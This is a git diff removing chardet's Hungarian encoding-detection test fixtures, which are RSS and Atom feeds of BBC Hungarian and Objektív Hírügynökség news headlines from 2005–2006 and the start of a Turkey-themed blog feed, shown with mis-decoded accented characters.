News - - - A vilבg olajkיszletei - http://www.bbc.co.uk/hungarian/specials/1819_oil_world/index.shtml - - 2005-03-15T12:47:14+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - Klםmavבltozבs – a vilבg nיgy יgtבjבn - http://www.bbc.co.uk/hungarian/specials/1417_climate/ - - 2005-03-24T19:47:34+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - - <link>http://www.bbc.co.uk/hungarian/specials/1555_pills/</link> - <description xml:lang="hu"/> - <dc:date>2004-12-06T11:08:11+0000</dc:date> - <dc:format>text/plain</dc:format> - <dc:language>hu</dc:language> - <dc:publisher>BBCHungarian.com</dc:publisher> - <dc:type>External Link, News</dc:type> - </item> - <item rdf:about="http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/external_link/2004/07/040718_newstateseu.shtml"> - <title xml:lang="hu">A kibץvlt Eurףpa - http://www.bbc.co.uk/hungarian/specials/1252_new_states/ - - 2005-04-29T13:44:04+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - XVI. Benedek cיlkitzיsei - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/04/050420_popegoals.shtml - Elsץ misיjיn XVI. Benedek pבpa kifejezte elkצtelezettsיgיt a Mבsodik Vatikבni Zsinat בltal meghatבrozott reformok irבnt. - 2005-04-20T13:56:05+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Irak, kיt יvvel Szaddam utבn - http://www.bbc.co.uk/hungarian/specials/1413_irak/index.shtml - - 2005-04-12T15:48:40+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - XVI. Benedek יlete kיpekben - http://www.bbc.co.uk/hungarian/specials/1144_ratzinger_life/ - - 2005-04-20T10:55:22+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - j vezetץje van a katolikus egyhבznak - http://www.bbc.co.uk/hungarian/specials/1847_new_pope/ - - 2005-04-19T17:51:54+0000 - text/plain - hu - BBCHungarian.com - External Link, News - - - - <link>http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2004/12/041223_carol.shtml</link> - <description xml:lang="hu">Az angol karבcsonyi dalok tצrtיnete</description> - <dc:date>2004-12-23T14:32:51+0000</dc:date> - <dc:format>text/plain</dc:format> - <dc:language>hu</dc:language> - <dc:publisher>BBCHungarian.com</dc:publisher> - <dc:creator>http://www.bbc.co.uk/hungarian/</dc:creator> - <dc:type>Story, News</dc:type> - </item> - <item rdf:about="http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2004/12/041223_panto.shtml"> - <title xml:lang="hu"/> - <link>http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2004/12/041223_panto.shtml</link> - <description xml:lang="hu">Egyedlבllף angol szםnhבzi hagyomבny</description> - <dc:date>2004-12-23T14:38:01+0000</dc:date> - <dc:format>text/plain</dc:format> - <dc:language>hu</dc:language> - <dc:publisher>BBCHungarian.com</dc:publisher> - <dc:creator>http://www.bbc.co.uk/hungarian/</dc:creator> - <dc:type>Story, News</dc:type> - </item> - <item rdf:about="http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050624_iranelextwo.shtml"> - <title xml:lang="hu">Vבlasztבsok Irבnban - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050624_iranelextwo.shtml - Sok irבni szerint orszבguk most vבlaszתt elץtt בll, de azt nem tudni, melyik irבnyt vבlasztjבk majd - 2005-06-24T14:08:52+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Kםnai cיg tett ajבnlatot az USA egyik legnagyobb olajtבrsasבgבra - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050624_chinausoil.shtml - Az Egyeslt ֱllamokban szenבtusi bizottsבgi meghallgatבson foglalkoztak a Kםna בltal tבmasztott תgymond "gazdasבgi fenyegetיssel". - 2005-06-24T16:33:25+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Tצbb tucat talibבnt צltek meg Afganisztבnban - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050622_afganistanus.shtml - Az utףbbi nיhבny hףnapban erץszakhullבm sצpצrt vיgig az orszבgon, amelyיrt a tבlibokat hibבztatjבk, יs amely tצbb szבz ember halבlבt okozta - 2005-06-22T14:07:54+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Konferencia Irak jצvץjיrץl - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050622_brusseliraq.shtml - Tצbb mint nyolcvan orszבg יs nemzetkצzi szervezet kldצttei vesznek rיszt a brsszeli megbeszיlיsen - 2005-06-22T13:47:00+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Ku Klux Klבn םtיlet 41 יv utבn - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050622_kukluxklan.shtml - Idץs baptista prיdikבtort םtיltek el hבrom gyilkossבg 41 יvvel ezelץtti kitervelיsייrt - 2005-06-22T05:30:26+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - 'Kultתra nיlkl nincs gazdasבgi fejlץdיs' - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050620_hungintrajk.shtml - A BBC Magyar Adבs vasבrnapi interjת cםm msorבnak vendיge Rajk Lבszlף volt - 2005-06-22T15:17:17+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - A jצvץ kצnyvtבrai - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050620_hunglibrary.shtml - Sokan jףsoltבk, hogy a televםziף, az Internet korבban egyre veszםt יrtיkיbץl a kצnyv יs a kצnyvtבr - 2005-06-20T11:58:38+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - 'A lיnyeg, hogy hosszת tבvon kell gondolkodni' - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050606_szalayberzeviczy.shtml - A BBC Magyar Adבs vasבrnapi interjתjבnak vendיge volt Szalay-Berzeviczy Attila, a Budapesti ֹrtיktץzsde elnצke - 2005-06-06T10:34:36+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - 'Mindig voltak feladataim יs cיljaim' - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050524_habsburginthung.shtml - A BBC Magyar Adבsבnak vasבrnapi vendיge volt Habsburg Ottף akivel Vincze Andrבs beszיlgetett - 2005-05-24T10:46:32+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - 'Meg kell tudnunk szףlםtani a liberבlis szavazףkat' - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/05/050519_kunczeinthung.shtml - A BBC Magyar Adבsבnak vendיge Kuncze Gבbor, a Szabad Demokratבk Szצvetsיgיnek elnצke volt - 2005-05-19T10:45:11+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Mandelson: 'Liberalizבlni kell az EU szolgבltatבsi piacבt' - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050624_mandelson.shtml - Mandelson a BBC-nek azt mondta, az energia, telekommunikבciףs, vasתti יs postai szolgבltatבsok piacבt meg kell nyitni a verseny elץtt - 2005-06-24T13:58:15+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Hatvandollבros rekordבron az olaj - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050624_oilsixty.shtml - A korבbbi rekord olajבrak sok gazdasבgi kבrt okoztak, יs hozzבjבrultak a globבlis gazdasבgi recessziףhoz is - 2005-06-24T11:59:13+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Jelentיs a nemzetkצzi bevבndorlבsrףl - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050622_migrationinternat.shtml - A Nemzetkצzi Migrבciףs Szervezet szerint a bevבndorlףk nem szipolyozzבk ki a fogadף orszבg gazdasבgבt - 2005-06-22T11:34:27+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - j stratיgiבt vבlaszt a Sony - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050622_sonynewstrategy.shtml - Nיhבny יve mיg a Sony uralta az elektronikai piacot a walkmannel, a Playstationnel יs mבs termיkekkel. - 2005-06-22T11:07:17+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Svיd - brit talבlkozף - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050621_perssonblair.shtml - Goran Persson svיd miniszterlnצk Londonban tבrgyal Tony Blair-rel az EU kצltsיgvetיsיrץl - 2005-06-21T13:42:57+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Japבn robotץrצk - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050624_japanrobotguards.shtml - A japבn irodבkat יs bevבsבrlףkצzpontokat hamarosan robotok fogjבk vיdeni betolakodףk ellen - 2005-06-24T11:53:17+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Patkבny okozta kבosz - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050622_newzeelanddrat.shtml - Egy patkבny okolhatף jelentץs rיszben az תj-zיlandi kommunikבciףs rendszerek צsszeomlבsביrt - 2005-06-22T10:46:55+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Fיltik a brit turistבkat a kיmektץl - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050620_spym15.shtml - A titkosszolgבlat arra figyelmezteti a briteket, hogy cיlpontjaivב vבlhatnak mבs orszבgok hםrszerzיsיnek - 2005-06-20T10:16:44+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Veszיlyben a skףt vצrצs mףkusok - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050617_squireldanger.shtml - A mףkushimlץt a brit fיlsziget dיlebbi terletein יlץ szrke mףkusok terjesztik, de rבjuk nem jelent veszיlyt - 2005-06-17T12:03:54+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - Mobiltelefon a KGB-tץl - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050614_kgbphone.shtml - A KGB utףdja בllםtףlag lehallgathatatlan mobiltelefont dobott piacra - 2005-06-14T02:58:23+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - - A vilבg legkisebb kefיje - http://www.bbc.co.uk/go/wsy/pub/rss/1.0/-/hungarian/news/story/2005/06/050613_nanothingie.shtml - Elkיszםtettיk a vilבg legkisebb kefיjיt, amelynek sצrtיi ezerszer vיkonyabbak az emberi hajszבlnבl - 2005-06-13T01:14:07+00:00 - text/plain - hu - BBCHungarian.com - http://www.bbc.co.uk/hungarian/ - Story, News - - \ No newline at end of file diff --git a/chardet/tests/windows-1250-hungarian/objektivhir.hu.xml b/chardet/tests/windows-1250-hungarian/objektivhir.hu.xml deleted file mode 100644 index 016f827..0000000 --- a/chardet/tests/windows-1250-hungarian/objektivhir.hu.xml +++ /dev/null @@ -1,183 +0,0 @@ - - - - - - - - Objektםv Hםrgynצksיg - Objektםv Hםrgynצksיg - hu - http://objektivhir.hu - A Web-oldalon talבlhatף cikkek יs fotףk ingyenesen יs szabadon felhasznבlhatףk, de kizבrףlag az Objektםv Hםrgynצksיg, mint hםrforrבs feltntetיsיvel. - objektivhir@objektivhir.hu (Gyrky Lבszlף) - hiros@index.hu (Hםrצs.Index Kft) - - http://objektivhir.hu - http://objektivhir.hu/images/logokicsi.jpg - Objektםv Hםrgynצksיg - - - - - ֱrhullבm a Kapos folyףn (fotףkkal) - http://www.objektivhir.hu/display/hir.php?hirid=23145 - Egy hיt alatt 30-35 mm csapadיk hullott a Kapos folyף vםzgyjtץ terletיn. Ez a felmelegedיs hatבsבra gyorsan elolvadt, amely a Kapos folyף יs a befolyף patakokon בrhullבmot idיzett elץ and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel az Orszבgos Katasztrףfavיdelmi Fץigazgatףsבg. - -Ez az בrhullבm a Kapos medrיt mintegy 50%-ig kitצlti. Januבr 2-בn יs 3-בn a katasztrףfavיdelem munkatבrsai a megye egיsz terletיn a legveszיlyeztetettebb pontokon helyszםni ellenץrzיst tartottak. Ezek sorבn megבllapםtottבk, hogy a kis vizek medrei nיhבny helyen telםtץdtek, illetve az alacsonyabban fekvץ kertekben, rיteken helyi belvםz alakult ki. Ez azonban mיg nem veszיlyezteti a lakף-, illetve gazdasבgi יpleteket. Ugyanakkor az ellenץrzיs sorבn tצbb olyan hiבnyossבgot בllapםtottak meg, amelyek akadבlyozzבk a vםz lefolyבsבt (pl. hidak, בtereszek eltצmץdיse, בrkokba tצrmelיkhordבs). Ezekre az akadבlyozף tיnyezץkre יs a szksיges intיzkedיsek megtיtelיre az יrintett polgבrmester urak figyelmיt felhםvtבk. A meteorolףgiai elץrejelzיs szerint a hיten tovבbbi 20-25 mm csapadיk vבrhatף esץ יs hף formבjבban, ezיrt minden terleten fokozottan figyelik a belvםzveszיlyes szakaszokat. - -A kיpek a Somogy Megyei Katasztrףfavיdelmi Igazgatףsבg felvיtelei. - -Hםrforrבs: OBJEKTֽV Hםrgynצksיg, 2006. januבr 4. - -Gy. Mיszבros ֱgnes - Wed, 04 Jan 2006 16:51:00 +0100 - - - - Nyugatrףl תjabb havazבs vבrhatף - http://www.objektivhir.hu/display/hir.php?hirid=23144 - A Dunבntתlon hidegfronti hatבs יrvיnyesl, mםg a keleti terleteken melegfronti hatבsra kell szבmםtani, de בtmenetileg mindentt gyengl a fronthatבs. ֽgy talבn kevesebben panaszkodnak fejfבjבsra, fבradtsבgra, levertsיgre, vagy יppen nyugtalansבgra. Rosszullיt is inkבbb csak a szםv- יs יrrendszeri problיmבkkal kszkצdץknיl fordulhat elץ. A nyirkos idץben azonban tovבbbra is gyakoriak a reumatikus panaszok, a napstיs hiבnya pedig erץsםtheti a depressziףra valף hajlamot and#8211; יrteslt az OBJEKTֽV Hםrgynצksיg a legfrissebb elץrejelzיs adatairףl az ORFK Kommunikבciףs Igazgatףsבgבtףl. - Wed, 04 Jan 2006 16:18:00 +0100 - - - - j magyar klkיpviseletek nyםltak - http://www.objektivhir.hu/display/hir.php?hirid=23143 - Rצvid idץn bell hבrom תj, a magyar klpolitika stratיgiai szempontjבbףl is klצnצsen fontos בllomבshellyel gyarapodott a magyar klkיpviseleti hבlףzat a dיlkelet-eurףpai tיrsיgben. Az תjיv elsץ napjבn megkezdte mkצdיsיt Pristinבban az ENSZ koszovףi missziףjבhoz, (UNMIK) akkreditבlt Magyar ײsszekצtץ Iroda, januבr harmadikבn megnyםlt a csםkszeredai fץkonzulבtus, november ףta pedig צnבllף kיpviselete van Magyarorszבgnak Montenegrףban and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel Polgבr Viktor klgyi szףvivץ. - Wed, 04 Jan 2006 14:43:00 +0100 - - - - Osztrבk hatבrץrצk dolgoznak a magyar-szerb hatבrszakaszon - http://www.objektivhir.hu/display/hir.php?hirid=23142 - A varsףi szיkhely Eurףpai Hatבrrendיszeti gynצksיg (FRONTEX) felkיrיse alapjבn a Kiskunhalasi Hatבrץr Igazgatףsבg munkatבrsai kיt osztrבk hatבrץrizeti szakemberrel egyttmkצdve vיgzik a nem uniףs בllampolgבrok hatבrrendיszeti ellenץrzיsיt יs hatבrבtlיptetיsיt januבr 3-a יs 8-a kצzצtt and#8211; יrteslt az OBJEKTֽV Hםrgynצksיg Nיmeth Zoltבntףl a Kiskunhalasi Hatבrץr Igazgatףsבg sajtףreferensיtץl. - Wed, 04 Jan 2006 14:36:00 +0100 - - - - Feloldottבk a hףlבnc-kצtelezettsיget - http://www.objektivhir.hu/display/hir.php?hirid=23141 - Szerdבn 14 ףrבtףl ideiglenesen nem kצtelezץ a hףlבnc meglיte a hazבnkba belיpץ autףsoknak and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel Kovבcs Ivבn a Hatבrץrsיg szףvivץje. - Wed, 04 Jan 2006 13:43:00 +0100 - - - - Ukrבn hajףt tartףztattak fel Grתzia partjainבl - http://www.objektivhir.hu/display/hir.php?hirid=23140 - A grתz Belgyminisztיrium Hatבrvיdelmi Fץhivatalבnak munkatבrsai feltartףztattak egy grתz zבszlף alatt futף ukrבn hajףt, and#8222;Razvedcsikand#8221; (Felderםtץ) nיvvel. A hajף tiltott terleten tartףzkodott and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel a Kבrpבtinfo. - Wed, 04 Jan 2006 11:44:00 +0100 - - - - Ukrבn turistבt sodort el a lavina - http://www.objektivhir.hu/display/hir.php?hirid=23139 - A tצrצk kutatף יs mentץcsapatok megtalבltבk azt az Ukrבn turistבt, akit kיt nappal ezelץtt sodort el egy lavina and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel az RSOE. - Wed, 04 Jan 2006 10:47:00 +0100 - - - - Kevesebb oltבs, biztonsבgosabb vakcinבk - http://www.objektivhir.hu/display/hir.php?hirid=23138 - Nagyjבbףl feleannyi tszתrבssal is elיrhetץ mostantףl, hogy a gyermekek megkapjבk a legfontosabb (kצtelezץ) vיdץoltבsokat. E mellett az eddiginיl biztonsבgosabbak a vakcinבk is, amelyek kevesebb mellיkhatבst okozhatnak. Akבrcsak eddig, a kצtelezץ vיdץoltבsok az תj rendszerben is ingyenesek maradnak. A korבbbi hםresztelיsek miatt fontos hangsתlyozni, hogy a bevezetיsre kerlץ תj oltףanyagok nem tartalmaznak semmilyen higanyvegyletet and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel a Kormבnyszףvivץi Iroda. - Wed, 04 Jan 2006 10:45:00 +0100 - - - - Soha nem lבtott temben fejlץdik az תthבlףzat - http://www.objektivhir.hu/display/hir.php?hirid=23137 - Idיn minden eddiginיl tצbb gyorsforgalmi תt יpl Magyarorszבgon. A 2006-ra tervezett mintegy 260 kilomיter, ami 11 תj szakaszt jelent, tצbbszצrצse a tavaly בtadott 95 kilomיternyi gyorsforgalmi תtnak, pedig mבr az is rekordnak szבmםtott and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel a Kormבnyszףvivץi Iroda. - Wed, 04 Jan 2006 10:40:00 +0100 - - - - Leszתrta a nevelץapjבt - http://www.objektivhir.hu/display/hir.php?hirid=23136 - Szתrt sיrlיssel szבllםtottak kףrhבzba egy 46 יves fיrfit januבr 3-בn kיsץdיlutבn a nagyhalבszi hבzבbףl. A nyomozבs jelenlegi adatai szerint a fיrfit 11 יves nevelt fia sebesםtette meg egy kיssel and#8211; יrteslt az OBJEKTֽV Hםrgynצksיg a Szabolcs-Szatmבr-Bereg Megyei RFK sajtףszolgבlatבtףl. - Wed, 04 Jan 2006 10:31:00 +0100 - - - - Kirabolta a nevelץanyjבt - http://www.objektivhir.hu/display/hir.php?hirid=23135 - Elfogtak יs ץrizetbe vettek az Esztergomi Rendץrkapitבnysבg rendץrei egy 34 יves esztergomi fיrfit kedden a kיsץ esti ףrבkban, aki a nevelץanyjבt erץszakkal - tlegelve יs rugdosva - arra kיnyszerםtette, hogy 3.500,-Ft kיszpיnzיt בtadja neki. A rablבskor a sיrtett vיdelmיre kelt a mבsik nevelt fia, akit a gyanתsםtott szintיn bבntalmazott and#8211; יrteslt az OBJEKTֽV Hםrgynצksיg a Komבrom-Esztergom Megyei RFK sajtףszolgבlatבtףl. - Wed, 04 Jan 2006 10:30:00 +0100 - - - - Oroszorszבg Krםm visszacsatolבsבval fenyeget - http://www.objektivhir.hu/display/hir.php?hirid=23133 - Szergej Ivanov orosz kormבnyfץ-helyettes, vיdelmi miniszter bejelentette, hogy amennyiben Ukrajna magasabb bיrleti dםjat fog kצvetelni az orosz Fekete-tengeri flotta בltal hasznבlt objektumokיrt, Moszkva בttekintheti a Krםm-fיlsziget 1954-es Ukrajnבhoz valף csatolבsבrףl szףlף megבllapodבst and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel a Kבrpבtinfo. - Wed, 04 Jan 2006 10:13:00 +0100 - - - - Megtalבltבk az orosz kisreplץ mבsodik pilףtבjבt - http://www.objektivhir.hu/display/hir.php?hirid=23134 - Megtalבltבk annak a kisreplץnek mבsodik pilףtבjבnak a holttestיt, amelyik januבr mבsodikבn zuhant le a harkivi reptיr kצzelיben. A tףban, ahova a gיp esett, bתvבrok dolgoznak. Nincs kizבrva, hogy hamarosan megtalבljבk a fekete dobozokat and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel a Kבrpבtinfo. - Wed, 04 Jan 2006 10:13:00 +0100 - - - - Nagy erej rengיsek Mexico partjainבl (tיrkיppel) - http://www.objektivhir.hu/display/hir.php?hirid=23132 - A USSG, az EMSC יs Tsunami Warning Center tבjיkoztatבsa szerint nagy erej, a Richter skבla szerinti 6.7, majd egy 4.4-es rengיst יszleltek Mexikף partjainבl and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel az RSOE. - -A rengיs epicentruma Santa Rosalםa teleplיstץl 89 kilomיterre, a tenger alatt 10 kilomיteres mיlysיgben volt. A Tsunami riasztף kצzpontok tבjיkoztatבsa szerint elkיpzelhetץ, hogy kis terleten szצkץבr alakulhatott ki. A figyelץszolgבlat 2 ףrבs figyelץszolgבlatot rendelt el. - -Hםrforrבs: OBJEKTֽV Hםrgynצksיg, 2006. januבr 4. - -Gy. Mיszבros ֱgnes - Wed, 04 Jan 2006 10:06:00 +0100 - - - - Tartבlykocsi יs szemיlyautף karambolja llיsen - http://www.objektivhir.hu/display/hir.php?hirid=23131 - Tartבlykocsival tkצzצtt egy szemיlyautף szerdבn a reggeli ףrבkban llיs belterletיn a - bordבnyi תton and#8211; יrteslt az OBJEKTֽV Hםrgynצksיg a Csongrבd Megyei RFK sajtףszolgבlatבtףl. - Wed, 04 Jan 2006 09:56:00 +0100 - - - - Trkkצs tolvaj az 53-as fץתton - http://www.objektivhir.hu/display/hir.php?hirid=23130 - Egy idץs embert fosztott ki trkkel egy ismeretlen autףs kedden fיnyes nappal az 53-as fץתton, a rendץrצk egy piros szםn nיmet rendszבmת Renault-t keresnek and#8211; יrteslt az OBJEKTֽV Hםrgynצksיg a Bבcs-Kiskun Megyei RFK sajtףszolgבlatבtףl. - Wed, 04 Jan 2006 08:17:00 +0100 - - - - Kilencezer villבmcsapבs, בramsznet Ausztrבliבban - http://www.objektivhir.hu/display/hir.php?hirid=23129 - Megkצzelםtץen 50 000 hבztartבs יs zlet marad בram nיlkl, miutבn heves vihar tצrt Ausztrבlia Queensland tartomבnyבra szerdבn and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel az RSOE. - Wed, 04 Jan 2006 08:15:00 +0100 - - - - jabb madבrinfluenzבs fertץzיs bukkant fel Kםnבban - http://www.objektivhir.hu/display/hir.php?hirid=23128 - Kםna hivatalosan is megerץsםtette, hogy תjabb madבrinfluenzבs megbetegedיseket יszleltek az orszבg dיli rיszיn fekvץ Sichuan tartomבnyban and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel az RSOE. - Wed, 04 Jan 2006 07:54:00 +0100 - - - - ֱradבsok Afganisztבnban - http://www.objektivhir.hu/display/hir.php?hirid=23127 - Heves esץzיsek sתjtjבk Afganisztבn יszaki rיszיn az elmתlt egy hיtben, amely sorבn eddig 130 יplet semmislt meg. - jelentette be az ENSZ and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel az RSOE. - Wed, 04 Jan 2006 07:52:00 +0100 - - - - Fצldcsuszamlבs temetett maga alב egy falut - http://www.objektivhir.hu/display/hir.php?hirid=23126 - A napok ףta tartף heves esץzיs Indonיzia Jבva szigetיn katasztrofבlis בllapotot idיzett elץ. A sziget keleti rיszיt nagy kiterjedיs בrvםz borםtja, a hegyvidיki terleteken pedig fצldcsuszamlבsok pusztםtanak. Szerda reggel egy falut temetett maga alב a lezתdulף fצld and#8211; tudatta az OBJEKTֽV Hםrgynצksיggel az RSOE. - Wed, 04 Jan 2006 07:51:00 +0100 - - - - \ No newline at end of file diff --git a/chardet/tests/windows-1250-hungarian/torokorszag.blogspot.com.xml b/chardet/tests/windows-1250-hungarian/torokorszag.blogspot.com.xml deleted file mode 100644 index 00242c0..0000000 --- a/chardet/tests/windows-1250-hungarian/torokorszag.blogspot.com.xml +++ /dev/null @@ -1,2202 +0,0 @@ - - - - - - -Tצrצkorszבg -A torokorszag.lap.hu olvasףinak יs Tצrצkorszבg barבtainak fףruma. - -ײrצmmel dvצzצllek a blog lבtogatףi kצzצtt. Javaslom, hogy előszצr is olvasd el a tartalomjegyzיket יs a bevezető postot ("A blogrףl יs arrףl, Te hogyan םrhatsz bele"). - - Efendi - -tag:blogger.com,1999:blog-7074887 -2006-01-04T14:04:53Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -Efendi - -2006-01-02T07:00:00+01:00 -2006-01-03T20:07:20Z -2004-09-02T16:21:10Z - -tag:blogger.com,1999:blog-7074887.post-109414207010042356 -Tartalomjegyzיk -<div align="center"><span style="color:#990000;"><span style="font-size:130%;"><strong>BOLDOG KARֱCSONYT, BֹKֹS ֹS SIKERES J ֹVET!</strong></span></span></div><div align="center"><span style="color:#990000;"><span style="font-size:130%;"><strong>YENI YILINIZ VE BAYRAMINIZ KUTLU OLSUN!</strong><br /></span></span><br /><a title="Photo Sharing" href="http://www.flickr.com/photos/efendi/76049494/"><img height="438" alt="The Monastery of the Holy Savior in Chora, Istanbul" src="http://static.flickr.com/41/76049494_16afcb4c90.jpg" width="500" /></a><br /></div><p><span style="font-size:85%;"></span><span style="font-size:85%;"></span><span style="font-size:85%;"></span><span style="font-size:85%;color:#ff0000;"></span><span style="font-size:85%;"></span><span style="font-size:85%;"></span><span style="color:#ff0000;"></span><span style="font-size:85%;"></span><span style="font-size:85%;"></span><u><span style="font-size:85%;color:#0000ff;"></span></u><span style="font-size:85%;color:#ff0000;"></span><span style="font-size:85%;"></span><span style="font-size:85%;color:#ff0000;"></span><span style="font-size:85%;color:#ff0000;"></span><span style="font-size:85%;color:#ff0000;"></span><span style="font-size:85%;color:#ff0000;"></span><span style="font-size:85%;color:#ff0000;"></span></p><p></p><p></p><div align="justify"><strong>A blog hבrom rיszből בll. Az első, a torokorszag.lap.hu egy tצrצk vonatkozבsת linkgyűjtemיny, amely a Startlapי. ֹn szerkesztem, elיg sok mindent megtalבlhatsz rajta, <a href="http://torokorszag.lap.hu/">l</a></strong><strong><a href="http://torokorszag.lap.hu/">inkje itt van</a></strong><strong>. A mבsodik maga ez a blog, a lבtogatףk sok-sok םrבsבval a "comments" linkeken. A harmadik egy tצrצk fotףgyűjtemיny, amelyet <a href="http://torokorszag.blogspot.com/2004/07/blog-fnykpalbuma-trk-fotmvszek-lapjai.html">erről a linkről</a> elindulva lבthatsz.</strong></div><div align="justify"><strong></strong><br /></div><div align="justify"><strong>Szףval, hos geldin. Ha előszצr jבrsz itt, </strong><span style="color:#ff0000;"><strong>lיgy szםves, olvasd el ezt a postot: </strong><a href="http://torokorszag.blogspot.com/2004/05/blogrl-s-arrl-te-hogyan-rhatsz-bele.html">A blogrףl יs arrףl, Te hogyan םrhatsz bele</a><span style="color:#000000;"> </span><strong>majd gyere vissza ide a tartalomjegyzיkhez<em>.</em> <span style="color:#000000;">Ha keresni akarsz a blogon (bבrhol, a hozzבszףlבsokban is), kattints a kצvetkező linkre: </span></strong></span><a href="http://search.freefind.com/find.html?id=68736779">Search this site</a>. Ott talבlsz site map-et is.<br /></div><div align="justify"><br /></div><div align="justify"><form action="http://www.bloglet.com/subscribe.asp" method="post"><p align="center"><span style="color:#ff0000;">Ha szeretnיl e-mailben יrtesםtיst kapni az תj postokrףl, akkor add meg a cםmedet a "subscribe" fצlצtti rubrikבban!<br /></span><input type="hidden" value="20023" name="ID"><br />Enter your email address below to subscribe to <b>Tצrצkorszבg blog</b>!<br /><input maxlength="100" name="email"><br /><input type="submit" value="subscribe" name="Submit"><br /><a href="http://www.bloglet.com/"><span style="font-size:78%;">powered by Bloglet</span></a> </p><p align="justify"><strong><span style="font-size:130%;color:#000000;"></span></strong></p><p align="center"><strong><span style="font-size:130%;color:#000000;">TARTALOMJEGYZֹK:</span></strong></p></form></div><strong><span style="font-size:130%;"></span></strong><div align="center"><br /></div><div align="center"><strong><span style="font-size:130%;"></span></strong></div><div align="center"><strong><span style="font-size:130%;"></span></strong></div><div align="center"><strong><span style="color:#ff0000;">1. AKTUֱLIS HֽREK</span></strong><br /></div><div align="center"><strong><span style="color:#ff0000;"></span></strong></div><div align="center"></div><div align="center"><strong><span style="color:#ff0000;"></span></strong></div><strong><span 